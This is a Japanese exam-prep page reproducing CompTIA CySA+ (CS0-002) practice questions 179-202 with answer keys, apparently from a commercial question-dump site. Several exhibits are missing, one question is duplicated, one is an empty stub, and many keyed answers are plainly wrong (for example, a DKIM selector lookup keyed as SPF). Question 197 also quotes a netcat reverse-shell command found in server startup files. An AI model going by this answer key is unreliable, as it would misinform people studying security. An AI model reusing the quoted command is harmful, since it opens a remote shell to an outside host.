[2023年02月]更新のCompTIA CS0-002問題集合格率を上げるならCS0-002試験問題集 [Q179-Q202]

[2023年02月]更新のCompTIA CS0-002問題集合格率を上げるならCS0-002試験問題集

あなたのゴールを成し遂げるための問題集！あなたのCompTIA Cybersecurity Analyst (CySA+) Certification Examの試験準備を合格するために実際のCompTIA CS0-002問題集をおすすめします

質問 179
A security analyst is reviewing a suspected phishing campaign that has targeted an organisation. The organization has enabled a few email security technologies in the last year: however, the analyst believes the security features are not working. The analyst runs the following command:
> dig domain._domainkey.comptia.orq TXT
Which of the following email protection technologies is the analyst MOST likely validating?

• A. DKIM
• B. DMARC
• C. DNSSEC
• D. SPF

正解: D

 

質問 180
A system's authority to operate (ATO) is set to expire in four days. Because of other activities and limited staffing, the organization has neglected to start reauthentication activities until now. The cybersecurity group just performed a vulnerability scan with the partial set of results shown below:

Based on the scenario and the output from the vulnerability scan, which of the following should the security team do with this finding?

• A. Ensure HTTP validation is enabled by rebooting the server.
• B. Accept this risk for now because this is a "high" severity, but testing will require more than the four days available, and the system ATO needs to be competed.
• C. Ignore it. This is false positive, and the organization needs to focus its efforts on other findings.
• D. Remediate by going to the web config file, searching for the enforce HTTP validation setting, and manually updating to the correct setting.

正解: D

 

質問 181
A web application has a newly discovered vulnerability in the authentication method used to validate known company users. The user ID of Admin with a password of "password" grants elevated access to the application over the Internet. Which of the following is the BEST method to discover the vulnerability before a production deployment?

• A. User acceptance testing
• B. Input validation
• C. Stress test the application
• D. Manual peer review

正解: B

 

質問 182
Which of the following systems would be at the GREATEST risk of compromise if found to have an open vulnerability associated with perfect forward secrecy?

• A. SIEM
• B. Virtual hosts
• C. Endpoints
• D. Layer 2 switches
• E. VPN concentrators

正解: E

 

質問 183
A system's authority to operate (ATO) is set to expire in four days. Because of other activities and limited staffing, the organization has neglected to start reauthentication activities until now. The cybersecurity group just performed a vulnerability scan with the partial set of results shown below:

Based on the scenario and the output from the vulnerability scan, which of the following should the security team do with this finding?

• A. Ensure HTTP validation is enabled by rebooting the server.
• B. Accept this risk for now because this is a "high" severity, but testing will require more than the four days available, and the system ATO needs to be competed.
• C. Ignore it. This is false positive, and the organization needs to focus its efforts on other findings.
• D. Remediate by going to the web config file, searching for the enforce HTTP validation setting, and manually updating to the correct setting.

正解: D

 

質問 184
An organization's internal department frequently uses a cloud provider to store large amounts of sensitive dat
a. A threat actor has deployed a virtual machine to at the use of the cloud hosted hypervisor, the threat actor has escalated the access rights. Which of the following actions would be BEST to remediate the vulnerability?

• A. Sandbox the virtual machine.
• B. Implement dedicated hardware for each customer.
• C. Update lo the secure hypervisor version.
• D. Implement an MFA solution.

正解: C

 

質問 185
A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops.
Which of the following tools would be appropriate to use in this case?

• A. DLP
• B. FIM
• C. SHA1sum
• D. MSBA

正解: C

 

質問 186
A security analyst is responding to an incident on a web server on the company network that is making a large number of outbound requests over DNS Which of the following is the FIRST step the analyst should take to evaluate this potential indicator of compromise'?

• A. Reimage the machine to remove the threat completely and get back to a normal running state.
• B. Start a network capture on the system to look into the DNS requests to validate command and control traffic.
• C. Isolate the system on the network to ensure it cannot access other systems while evaluation is underway.
• D. Run an anti-malware scan on the system to detect and eradicate the current threat
• E. Shut down the system to prevent further degradation of the company network

正解: D

 

質問 187
An analyst has been asked to provide feedback regarding the controls required by a revised regulatory framework. At this time, the analyst only needs to focus on the technical controls.
Which of the following should the analyst provide an assessment of?

• A. Tokenization of sensitive data
• B. Formal identification of data ownership
• C. Execution of NDAs
• D. Reporting on data retention and purging activities
• E. Establishment of data classifications

正解: A

 

質問 188
The help desk provided a security analyst with a screenshot of a user's desktop:

For which of the following is aircrack-ng being used?

• A. Rainbow attack
• B. Brute-force attack
• C. Wireless access point discovery
• D. PCAP data collection

正解: A

 

質問 189
As part of an organization's information security governance process, a Chief Information Security Officer (CISO) is working with the compliance officer to update policies to include statements related to new regulatory and legal requirements. Which of the following should be done to BEST ensure all employees are appropriately aware of changes to the policies?

• A. Distribute revised copies of policies to employees and obtain a signed acknowledgement from them
• B. Conduct a risk assessment based on the controls defined in the newly revised policies
• C. Post the policies on the organization's intranet and provide copies of any revised policies to all active vendors
• D. Require all employees to attend updated security awareness training and sign an acknowledgement

正解: D

 

質問 190
An application contains the following log entries in a file named "authlog.log":

A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task?

• A. cat "authlog.log" | grep "User" | cut -F' ' | echo "username exists: $1"
• B. grep -e "successfully" authlog.log | awk '{print $2}' | sed s/\'//g
• C. echo authlog.log > sed 's/User//' | print "username exists: $User"
• D. cat authlog.log | grep "2016-01-01" | echo "valid username found: $2"

正解: A

 

質問 191
The Dirty COW attack is an example of what type of vulnerability?

• A. Malicious code
• B. Privilege escalation
• C. Buffer overflow
• D. LDAP injection

正解: B

 

質問 192
A database administrator contacts a security administrator to request firewall changes for a connection to a new internal application.
The security administrator notices that the new application uses a port typically monopolized by a virus.
The security administrator denies the request and suggests a new port or service be used to complete the application's task.
Which of the following is the security administrator practicing in this example?

• A. Port security
• B. Implicit deny
• C. Explicit deny
• D. Access control lists

正解: D

 

質問 193
A security analyst is reviewing the following DNS logs as part of security-monitoring activities:

Which of the following MOST likely occurred?

• A. The attack attempted to contact www.gooqle com to verify Internet connectivity.
• B. The attack caused an internal host to connect to a command and control server.
• C. The attack used encryption to obfuscate the payload and bypass detection by an IDS.
• D. The attack used an algorithm to generate command and control information dynamically.

正解: B

 

質問 194
A cybersecurity consultant is reviewing the following output from a vulnerability scan against a newly installed MS SQL Server 2012 that is slated to go into production in one week:

Based on the above information, which of the following should the system administrator do?
(Select TWO).

• A. Implement the proposed solution by installing Microsoft patch Q316333.
• B. Mark the result as a false positive so it will show in subsequent scans.
• C. Configure a network-based ACL at the perimeter firewall to protect the MS SQL port.
• D. Review the references to determine if the vulnerability can be remotely exploited.
• E. Verify the vulnerability using penetration testing tools or proof-of-concept exploits.

正解: A,C

 

質問 195
Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in the desk ticket queue.
INSTRUCTIONS
Click on me ticket to see the ticket details Additional content is available on tabs within the ticket First, select the appropriate issue from the drop-down menu. Then, select the MOST likely root cause from second drop-down menu If at any time you would like to bring back the initial state of the simulation, please click the Reset All button

正解:

解説:

 

質問 196
A cybersecurity analyst is reviewing the following outputs:

Which of the following can the analyst infer from the above output?

• A. The remote host is running a web server on port 80.
• B. The remote host is running a service on port 8080.
• C. The remote host is redirecting port 80 to port 8080.
• D. The remote host's firewall is dropping packets for port 80.

正解: B

 

質問 197
A security analyst is investigating the possible compromise of a production server for the company's public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

In some of the portal's startup command files, the following command appears:
nc -o /bin/sh 72.14.1.36 4444
Investigating further, the analyst runs Netstat and obtains the following output

Which of the following is the best step for the analyst to take NEXT?

• A. Manually review the robots .txt file for errors
• B. Initiate the security incident response process
• C. Recommend training to avoid mistakes in production command files
• D. Delete the unknown files from the production servers
• E. Patch a new vulnerability that has been discovered

正解: A

 

質問 198
An organization has been conducting penetration testing to identify possible network vulnerabilities. One of the security policies states that web servers and database servers must not be co-located on the same server unless one of them runs on a non-standard. The penetration tester has received the following outputs from the latest set of scans:

Which of the following servers is out of compliance?

• A. orgServer
• B. finServer
• C. opsServer
• D. adminServer

正解: A

 

質問 199
Which of the following should a database administrator implement to BEST protect data from an untrusted server administrator?

• A. Data encryption
• B. Data minimization
• C. Data deidentification
• D. Data masking

正解: A

 

質問 200
A developer downloaded and attempted to install a file transfer application in which the installation package is bundled with acKvare. The next-generation antivirus software prevented the file from executing, but it did not remove the file from the device. Over the next few days, more developers tried to download and execute the offending file. Which of the following changes should be made to the security tools to BEST remedy the issue?

• A. Remove administrative rights from all developer workstations.
• B. Blacklist the hash in the next-generation antivirus system.
• C. Block the download of the fie via the web proxy
• D. Manually delete the file from each of the workstations.

正解: C

 

質問 201
A storage area network (SAN) was inadvertently powered off while power maintenance was being performed in a datacenter. None of the systems should have lost all power during the maintenance. Upon review, it is discovered that a SAN administrator moved a power plug when testing the SAN's fault notification features.
Which of the following should be done to prevent this issue from reoccurring?

• A. Install a third power supply in the SAN so loss of any power intuit does not result in the SAN completely powering off.
• B. Ensure power configuration is covered in the datacenter change management policy and have the SAN
  administrator review this policy.
• C. Install additional batteries in the SAN power supplies with enough capacity to keep the system powered on during maintenance operations.
• D. Ensure both power supplies on the SAN are serviced by separate circuits, so that if one circuit goes down, the other remains powered.

正解: D

 

質問 202
......

正確でかつ完璧 アンサーはまるでリアル試験問題：https://www.jpntest.com/shiken/CS0-002-mondaishu